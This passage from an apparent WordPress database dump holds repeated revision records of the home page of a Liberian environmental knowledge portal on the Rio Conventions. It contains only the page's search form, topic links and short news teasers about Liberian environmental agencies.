id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"76\">Case Studies</option>\n	<option value=\"78\">Conventions</option>\n	<option value=\"79\">Factsheets</option>\n	<option value=\"161\">Guidelines</option>\n	<option value=\"82\">Leaflets</option>\n	<option value=\"84\">Newsletters</option>\n	<option value=\"85\">Policies</option>\n	<option value=\"209\">Project Document</option>\n	<option value=\"86\">Reports</option>\n	<option value=\"178\">Research</option>\n	<option value=\"88\">Strategy and Action Plans</option>\n	<option value=\"89\">Toolkits</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Select a Topic</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.</p>		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Document</h2>		\n		<p>Explore the EKMS Documents Database.</p>		\n			<a href=\"https://ekmsliberia.info/documents-database/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Latest News & Blogs</h1>		\n	<a href=\"https://ekmsliberia.info/epa-undp-built-system-to-hold-environmental-data/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/pic1-1.jpg\" alt=\"EPA, UNDP Built System To Hold Environmental Data\" width=\"1024\" height=\"530\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/epa-undp-built-system-to-hold-environmental-data/\">EPA, UNDP Built System To Hold Environmental Data</a></h4>The Environmental Protection Agency of Liberia (EPA) and the United&hellip;\n	<a href=\"https://ekmsliberia.info/giz-partners-with-ministry-of-mines-energy-to-develop-artisinal-mining-regulatory-roadmap/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/Illicit-mining.jpg\" alt=\"GIZ Partners With Ministry of Mines &amp; Energy to Develop Artisinal Mining Regulatory Roadmap\" width=\"1024\" height=\"530\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/giz-partners-with-ministry-of-mines-energy-to-develop-artisinal-mining-regulatory-roadmap/\">GIZ Partners With Ministry of Mines & Energy to Develop...</a></h4>Recognizing the immense potential for the artisanal mining sector to&hellip;\n	<a href=\"https://ekmsliberia.info/fda-to-build-new-dock-at-lake-piso/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/FDA-MD.jpg\" alt=\"FDA to Build New Dock at Lake Piso\" width=\"1024\" height=\"530\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/fda-to-build-new-dock-at-lake-piso/\">FDA to Build New Dock at Lake Piso</a></h4>A joint team of FDA and GSA technicians working with&hellip;\n	<a href=\"https://ekmsliberia.info/fda-boss-wants-forest-rangers-armed/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/pic2.jpg\" alt=\"FDA Boss Wants Forest Rangers Armed\" width=\"1024\" height=\"530\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/fda-boss-wants-forest-rangers-armed/\">FDA Boss Wants Forest Rangers Armed</a></h4>The Managing Director of the Forestry Development Authority (FDA) C.&hellip;\n			<a href=\"https://ekmsliberia.info/news-and-blogs/\" role=\"button\">\n						Read All News & Blogs\n					</a>\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									<p>Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resources by submitting a blog, news, case study, report or a publication?</p>\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2021-08-17 16:25:02','2021-08-17 16:25:02','',9,'https://ekmsliberia.info/?p=3927',0,'revision','',0),(3928,38,'2021-08-17 16:25:02','2021-08-17 16:25:02','<h2>Welcome to the EKMS</h2>		\n		<p>The EKMS provides free and open access to information from key government and partner institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:[&quot;document&quot;,&quot;institution&quot;,&quot;mea_resource&quot;,&quot;project_resource&quot;,&quot;related_topic&quot;],&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n							<input type=\"hidden\" value=\"document,institution,mea_resource,project_resource,related_topic\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"76\">Case Studies</option>\n	<option value=\"78\">Conventions</option>\n	<option value=\"79\">Factsheets</option>\n	<option value=\"161\">Guidelines</option>\n	<option value=\"82\">Leaflets</option>\n	<option value=\"84\">Newsletters</option>\n	<option value=\"85\">Policies</option>\n	<option value=\"209\">Project Document</option>\n	<option value=\"86\">Reports</option>\n	<option value=\"178\">Research</option>\n	<option value=\"88\">Strategy and Action Plans</option>\n	<option value=\"89\">Toolkits</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Select a Topic</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.</p>		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Document</h2>		\n		<p>Explore the EKMS Documents Database.</p>		\n			<a href=\"https://ekmsliberia.info/documents-database/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Latest News & Blogs</h1>		\n	<a href=\"https://ekmsliberia.info/epa-undp-built-system-to-hold-environmental-data/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/pic1-1.jpg\" alt=\"EPA, UNDP Built System To Hold Environmental Data\" width=\"1024\" height=\"530\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/epa-undp-built-system-to-hold-environmental-data/\">EPA, UNDP Built System To Hold Environmental Data</a></h4>The Environmental Protection Agency of Liberia (EPA) and the United&hellip;\n	<a href=\"https://ekmsliberia.info/giz-partners-with-ministry-of-mines-energy-to-develop-artisinal-mining-regulatory-roadmap/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/Illicit-mining.jpg\" alt=\"GIZ Partners With Ministry of Mines &amp; Energy to Develop Artisinal Mining Regulatory Roadmap\" width=\"1024\" height=\"530\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/giz-partners-with-ministry-of-mines-energy-to-develop-artisinal-mining-regulatory-roadmap/\">GIZ Partners With Ministry of Mines & Energy to Develop...</a></h4>Recognizing the immense potential for the artisanal mining sector to&hellip;\n	<a href=\"https://ekmsliberia.info/fda-to-build-new-dock-at-lake-piso/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/FDA-MD.jpg\" alt=\"FDA to Build New Dock at Lake Piso\" width=\"1024\" height=\"530\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/fda-to-build-new-dock-at-lake-piso/\">FDA to Build New Dock at Lake Piso</a></h4>A joint team of FDA and GSA technicians working with&hellip;\n	<a href=\"https://ekmsliberia.info/fda-boss-wants-forest-rangers-armed/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/pic2.jpg\" alt=\"FDA Boss Wants Forest Rangers Armed\" width=\"1024\" height=\"530\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/fda-boss-wants-forest-rangers-armed/\">FDA Boss Wants Forest Rangers Armed</a></h4>The Managing Director of the Forestry Development Authority (FDA) C.&hellip;\n			<a href=\"https://ekmsliberia.info/news-and-blogs/\" role=\"button\">\n						Read All News & Blogs\n					</a>\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									<p>Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resources by submitting a blog, news, case study, report or a publication?</p>\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2021-08-17 16:25:02','2021-08-17 16:25:02','',9,'https://ekmsliberia.info/?p=3928',0,'revision','',0),(3929,38,'2021-08-17 16:25:03','2021-08-17 16:25:03','Convention on Biological Diversity CBD is dedicated to promoting sustainable developmentRead MoreConvention on Climate ChangeThe ultimate objective of the Convention is to stabilize greenhouse gas concentrations \"at a level that would prevent dangerous anthropogenic (human induced) interference with the climate system.\"Read MoreConvention to Combat DesertificationA sole legally binding international agreement linking environment and development to sustainable land management.Read More				\n							Previous\n							Next\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\" target=\"\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:[&quot;document&quot;,&quot;institution&quot;,&quot;mea_resource&quot;,&quot;project_resource&quot;,&quot;related_topic&quot;],&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n							<input type=\"hidden\" value=\"document,institution,mea_resource,project_resource,related_topic\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"76\">Case Studies</option>\n	<option value=\"78\">Conventions</option>\n	<option value=\"79\">Factsheets</option>\n	<option value=\"161\">Guidelines</option>\n	<option value=\"82\">Leaflets</option>\n	<option value=\"84\">Newsletters</option>\n	<option value=\"85\">Policies</option>\n	<option value=\"225\">Presentations</option>\n	<option value=\"209\">Project Document</option>\n	<option value=\"86\">Reports</option>\n	<option value=\"178\">Research</option>\n	<option value=\"88\">Strategy and Action Plans</option>\n	<option value=\"89\">Toolkits</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n			<button>See all results</button>			\n			<h1>Select a Topic</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fas fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.</p>		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Document</h2>		\n		<p>Explore the EKMS Documents Database.</p>		\n			<a href=\"https://ekmsliberia.info/documents-database/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Latest News & Blogs</h1>		\n	<a href=\"https://ekmsliberia.info/liberias-grassroots-solar-energy-innovator/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/kehkeh.png\" alt=\"Liberia’s Grassroots Solar Energy Innovator\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/blog/\">Blog</a><h4><a href=\"https://ekmsliberia.info/liberias-grassroots-solar-energy-innovator/\">Liberia’s Grassroots Solar Energy Innovator</a></h4>Across the world, innovators from different sectors have invented devices,&hellip;\n	<a href=\"https://ekmsliberia.info/nafaa-fines-illegal-ivorian-fisherman-us5000-00/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/Untitled.png\" alt=\"NaFAA Fines Illegal Ivorian Fisherman US$5,000.00\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/nafaa-fines-illegal-ivorian-fisherman-us5000-00/\">NaFAA Fines Illegal Ivorian Fisherman US$5,000.00</a></h4>To deter illegal, unreported and unregulated (IUU) fishing across Liberia,&hellip;\n	<a href=\"https://ekmsliberia.info/nafaa-along-with-national-coast-guard-rescue-fishermen-lost-at-sea/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/nafaa.png\" alt=\"NaFAA Along With National Coast Guard Rescue Fishermen Lost at Sea\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/nafaa-along-with-national-coast-guard-rescue-fishermen-lost-at-sea/\">NaFAA Along With National Coast Guard Rescue Fishermen Lost at...</a></h4>National Fisheries and Aquaculture Authority(NaFAA) in collaboration with the Liberia&hellip;\n	<a href=\"https://ekmsliberia.info/epa-technicians-carry-out-inventory-on-animal-welfare-at-libassa-wildlife-sanctuary-in-marshall-margibi-county/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/libassa.png\" alt=\"EPA Technicians Carry Out Inventory on Animal Welfare at Libassa Wildlife Sanctuary in Marshall, Margibi County\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/epa-technicians-carry-out-inventory-on-animal-welfare-at-libassa-wildlife-sanctuary-in-marshall-margibi-county/\">EPA Technicians Carry Out Inventory on Animal Welfare at Libassa...</a></h4>Technicians from the EPA headed by Hawa Walker, assistant manager&hellip;\n			<a href=\"https://ekmsliberia.info/news-and-blogs/\" role=\"button\">\n						Read All News & Blogs\n					</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2021-08-17 16:25:03','2021-08-17 16:25:03','',9,'https://ekmsliberia.info/?p=3929',0,'revision','',0),(3930,38,'2021-08-17 16:25:44','2021-08-17 16:25:44','Convention on Biological Diversity CBD is dedicated to promoting sustainable developmentRead MoreConvention on Climate ChangeThe ultimate objective of the Convention is to stabilize greenhouse gas concentrations \"at a level that would prevent dangerous anthropogenic (human induced) interference with the climate system.\"Read MoreConvention to Combat DesertificationA sole legally binding international agreement linking environment and development to sustainable land management.Read More				\n							Previous\n							Next\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\" target=\"\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:[&quot;document&quot;,&quot;institution&quot;,&quot;mea_resource&quot;,&quot;project_resource&quot;,&quot;related_topic&quot;],&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n							<input type=\"hidden\" value=\"document,institution,mea_resource,project_resource,related_topic\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"76\">Case Studies</option>\n	<option value=\"78\">Conventions</option>\n	<option value=\"79\">Factsheets</option>\n	<option value=\"161\">Guidelines</option>\n	<option value=\"82\">Leaflets</option>\n	<option value=\"84\">Newsletters</option>\n	<option value=\"85\">Policies</option>\n	<option value=\"225\">Presentations</option>\n	<option value=\"209\">Project Document</option>\n	<option value=\"86\">Reports</option>\n	<option value=\"178\">Research</option>\n	<option value=\"88\">Strategy and Action Plans</option>\n	<option value=\"89\">Toolkits</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n			<button>See all results</button>			\n			<h1>Select a Topic</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fas fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.</p>		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Document</h2>		\n		<p>Explore the EKMS Documents Database.</p>		\n			<a href=\"https://ekmsliberia.info/documents-database/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Latest News & Blogs</h1>		\n	<a href=\"https://ekmsliberia.info/liberias-grassroots-solar-energy-innovator/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/kehkeh.png\" alt=\"Liberia’s Grassroots Solar Energy Innovator\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/blog/\">Blog</a><h4><a href=\"https://ekmsliberia.info/liberias-grassroots-solar-energy-innovator/\">Liberia’s Grassroots Solar Energy Innovator</a></h4>Across the world, innovators from different sectors have invented devices,&hellip;\n	<a href=\"https://ekmsliberia.info/nafaa-fines-illegal-ivorian-fisherman-us5000-00/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/Untitled.png\" alt=\"NaFAA Fines Illegal Ivorian Fisherman US$5,000.00\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/nafaa-fines-illegal-ivorian-fisherman-us5000-00/\">NaFAA Fines Illegal Ivorian Fisherman US$5,000.00</a></h4>To deter illegal, unreported and unregulated (IUU) fishing across Liberia,&hellip;\n	<a href=\"https://ekmsliberia.info/nafaa-along-with-national-coast-guard-rescue-fishermen-lost-at-sea/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/nafaa.png\" alt=\"NaFAA Along With National Coast Guard Rescue Fishermen Lost at Sea\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/nafaa-along-with-national-coast-guard-rescue-fishermen-lost-at-sea/\">NaFAA Along With National Coast Guard Rescue Fishermen Lost at...</a></h4>National Fisheries and Aquaculture Authority(NaFAA) in collaboration with the Liberia&hellip;\n	<a href=\"https://ekmsliberia.info/epa-technicians-carry-out-inventory-on-animal-welfare-at-libassa-wildlife-sanctuary-in-marshall-margibi-county/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/libassa.png\" alt=\"EPA Technicians Carry Out Inventory on Animal Welfare at Libassa Wildlife Sanctuary in Marshall, Margibi County\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/epa-technicians-carry-out-inventory-on-animal-welfare-at-libassa-wildlife-sanctuary-in-marshall-margibi-county/\">EPA Technicians Carry Out Inventory on Animal Welfare at Libassa...</a></h4>Technicians from the EPA headed by Hawa Walker, assistant manager&hellip;\n			<a href=\"https://ekmsliberia.info/news-and-blogs/\" role=\"button\">\n						Read All News & Blogs\n					</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2021-08-17 16:25:44','2021-08-17 16:25:44','',9,'https://ekmsliberia.info/?p=3930',0,'revision','',0),(3931,38,'2021-08-17 16:25:44','2021-08-17 16:25:44','Convention on Biological Diversity CBD is dedicated to promoting sustainable developmentRead MoreConvention on Climate ChangeThe ultimate objective of the Convention is to stabilize greenhouse gas concentrations \"at a level that would prevent dangerous anthropogenic (human induced) interference with the climate system.\"Read MoreConvention to Combat DesertificationA sole legally binding international agreement linking environment and development to sustainable land management.Read More				\n							Previous\n							Next\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\" target=\"\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:[&quot;document&quot;,&quot;institution&quot;,&quot;mea_resource&quot;,&quot;project_resource&quot;,&quot;related_topic&quot;],&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n							<input type=\"hidden\" value=\"document,institution,mea_resource,project_resource,related_topic\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"76\">Case Studies</option>\n	<option value=\"78\">Conventions</option>\n	<option value=\"79\">Factsheets</option>\n	<option value=\"161\">Guidelines</option>\n	<option value=\"82\">Leaflets</option>\n	<option value=\"84\">Newsletters</option>\n	<option value=\"85\">Policies</option>\n	<option value=\"225\">Presentations</option>\n	<option value=\"209\">Project Document</option>\n	<option value=\"86\">Reports</option>\n	<option value=\"178\">Research</option>\n	<option value=\"88\">Strategy and Action Plans</option>\n	<option value=\"89\">Toolkits</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n			<button>See all results</button>			\n			<h1>Select a Topic</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fas fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.</p>		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Document</h2>		\n		<p>Explore the EKMS Documents Database.</p>		\n			<a href=\"https://ekmsliberia.info/documents-database/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Latest News & Blogs</h1>		\n	<a href=\"https://ekmsliberia.info/liberias-grassroots-solar-energy-innovator/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/kehkeh.png\" alt=\"Liberia’s Grassroots Solar Energy Innovator\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/blog/\">Blog</a><h4><a href=\"https://ekmsliberia.info/liberias-grassroots-solar-energy-innovator/\">Liberia’s Grassroots Solar Energy Innovator</a></h4>Across the world, innovators from different sectors have invented devices,&hellip;\n	<a href=\"https://ekmsliberia.info/nafaa-fines-illegal-ivorian-fisherman-us5000-00/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/Untitled.png\" alt=\"NaFAA Fines Illegal Ivorian Fisherman US$5,000.00\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/nafaa-fines-illegal-ivorian-fisherman-us5000-00/\">NaFAA Fines Illegal Ivorian Fisherman US$5,000.00</a></h4>To deter illegal, unreported and unregulated (IUU) fishing across Liberia,&hellip;\n	<a href=\"https://ekmsliberia.info/nafaa-along-with-national-coast-guard-rescue-fishermen-lost-at-sea/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/nafaa.png\" alt=\"NaFAA Along With National Coast Guard Rescue Fishermen Lost at Sea\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/nafaa-along-with-national-coast-guard-rescue-fishermen-lost-at-sea/\">NaFAA Along With National Coast Guard Rescue Fishermen Lost at...</a></h4>National Fisheries and Aquaculture Authority(NaFAA) in collaboration with the Liberia&hellip;\n	<a href=\"https://ekmsliberia.info/epa-technicians-carry-out-inventory-on-animal-welfare-at-libassa-wildlife-sanctuary-in-marshall-margibi-county/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/libassa.png\" alt=\"EPA Technicians Carry Out Inventory on Animal Welfare at Libassa Wildlife Sanctuary in Marshall, Margibi County\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/epa-technicians-carry-out-inventory-on-animal-welfare-at-libassa-wildlife-sanctuary-in-marshall-margibi-county/\">EPA Technicians Carry Out Inventory on Animal Welfare at Libassa...</a></h4>Technicians from the EPA headed by Hawa Walker, assistant manager&hellip;\n			<a href=\"https://ekmsliberia.info/news-and-blogs/\" role=\"button\">\n						Read All News & Blogs\n					</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2021-08-17 16:25:44','2021-08-17 